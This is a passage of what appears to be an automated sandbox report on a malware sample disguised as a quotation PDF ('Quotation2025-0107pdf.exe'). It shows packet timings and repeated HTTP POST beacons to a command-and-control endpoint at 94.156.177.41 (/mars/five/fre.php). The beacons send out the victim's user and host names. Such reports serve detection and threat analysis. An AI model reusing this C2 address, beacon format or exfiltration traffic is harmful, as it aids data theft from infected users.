                                                                                    Jan 7, 2025 12:33:47.773051023 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:47.778207064 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:47.778271914 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:47.780200005 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:47.784935951 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:47.784972906 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:47.789711952 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.495321035 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.495516062 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.495517015 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.495770931 CET5012580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.501353979 CET805012594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.630312920 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.635166883 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.635241032 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.637233973 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.642028093 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:48.642095089 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:48.646922112 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.400657892 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.400752068 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.400960922 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.400960922 CET5012680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.405760050 CET805012694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.541573048 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.546516895 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.546646118 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.548605919 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.553371906 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:49.553436995 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:49.558242083 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.308175087 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.308247089 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.308279037 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.308316946 CET5012780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.313199997 CET805012794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.453671932 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.458703041 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.458931923 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.460906982 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.465702057 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:50.465759039 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:50.470571041 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.191889048 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.192025900 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.192039967 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.192080975 CET5012880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.196923018 CET805012894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.335407019 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.340281010 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.340362072 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.342359066 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.347120047 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:51.347193956 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:51.351957083 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.077549934 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.077575922 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.077622890 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.077656031 CET5012980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.082480907 CET805012994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.210675955 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.215564966 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.215636969 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.217780113 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.222628117 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:52.222675085 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:52.227426052 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.256197929 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.256233931 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.256246090 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.256310940 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.256354094 CET5013080192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.261118889 CET805013094.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.609107971 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.614001989 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.614085913 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.616158962 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.620896101 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:53.621252060 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:53.626000881 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.360265017 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.360343933 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.360403061 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.360430956 CET5013180192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.365192890 CET805013194.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.507390022 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.512236118 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.512322903 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.514339924 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.519119978 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:54.519172907 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:54.524010897 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.261075974 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.263113022 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.263205051 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.263248920 CET5013280192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.267999887 CET805013294.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.400938988 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.405919075 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.405992031 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.408056021 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.412822962 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:55.412869930 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:55.417695045 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.154334068 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.154349089 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.154405117 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.167496920 CET5013380192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.172323942 CET805013394.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.450910091 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.455753088 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.455821991 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.458128929 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.462874889 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:56.462920904 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:56.467672110 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.175021887 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.175091982 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.175144911 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.175179958 CET5013480192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.179972887 CET805013494.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.324886084 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.329741955 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.332804918 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.334798098 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.339726925 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:57.340598106 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:57.345369101 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.088736057 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.088917017 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.088990927 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.089026928 CET5013580192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.093795061 CET805013594.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.227827072 CET5013680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.232640982 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.232728004 CET5013680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.234776974 CET5013680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.239554882 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.239631891 CET5013680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.245035887 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.979218006 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.979330063 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:58.979378939 CET5013680192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:58.984297037 CET805013694.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.116538048 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.121347904 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.121423960 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.123577118 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.128354073 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.128388882 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.133160114 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.832437992 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.832453966 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.832529068 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.832592964 CET5013780192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.837374926 CET805013794.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.967458963 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.972311974 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.972384930 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.974517107 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.979356050 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:33:59.979403019 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:33:59.984196901 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:00.722080946 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:00.722198009 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:00.722378969 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:00.722472906 CET5013880192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:00.727210999 CET805013894.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.011744976 CET5013980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:01.016669035 CET805013994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.017076969 CET5013980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:01.019305944 CET5013980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:01.024106026 CET805013994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.024157047 CET5013980192.168.2.494.156.177.41
                                                                                    Jan 7, 2025 12:34:01.028882027 CET805013994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.830324888 CET805013994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.830348015 CET805013994.156.177.41192.168.2.4
                                                                                    Jan 7, 2025 12:34:01.830408096 CET5013980192.168.2.494.156.177.41
                                                                                    • 94.156.177.41
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.44973594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:00.792104959 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 176
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:00.796955109 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: 'ckav.rujones134349JONES-PCk0FDD42EE188E931437F4FBE2CUj5TF
                                                                                    Jan 7, 2025 12:32:01.519831896 CET185INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:01 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.44973794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:01.749722958 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 176
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:01.754698992 CET176OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: 'ckav.rujones134349JONES-PC+0FDD42EE188E931437F4FBE2CSvQPc
                                                                                    Jan 7, 2025 12:32:02.466386080 CET185INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:02 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.44973994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:02.545078993 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:02.549907923 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:03.274969101 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:03 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.44974094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:03.597286940 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:03.602113962 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:04.338901043 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:04 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.44974194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:04.485605955 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:04.490437984 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:05.248064995 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:05 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.44974294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:05.407216072 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:05.412187099 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:07.009295940 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:06 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.
                                                                                    Jan 7, 2025 12:32:07.009385109 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:06 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.
                                                                                    Jan 7, 2025 12:32:07.009649038 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:06 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.44974394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:07.182356119 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:07.187246084 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:07.934948921 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:07 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.44974494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:08.078979969 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:08.083803892 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:08.818167925 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:08 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


